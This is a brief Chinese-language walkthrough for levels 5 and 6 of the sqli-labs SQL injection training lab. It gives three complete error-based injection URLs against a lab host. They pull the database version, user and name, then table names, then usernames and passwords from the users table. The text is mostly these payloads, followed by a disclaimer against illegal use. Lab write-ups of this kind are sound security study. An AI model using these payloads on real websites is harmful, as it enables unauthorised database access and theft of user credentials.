环境sqli-labs
less 5
1、我们随便输入',看到报错信息
可以判断,需要单引号闭合
2、构造查询获取数据库名称语句
http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+
3、获取表名语句
http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a)from information_schema.tables where table_schema=database() limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+
4、获取用户信息
http://192.168.1.120/sqli/Less-5/?id=1' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a)from security.users limit 2,1),floor (rand(0)*2))x from information_schema.tables group by x)a --+
less 6
双引号闭合,和上面方法相同
禁止非法,后果自负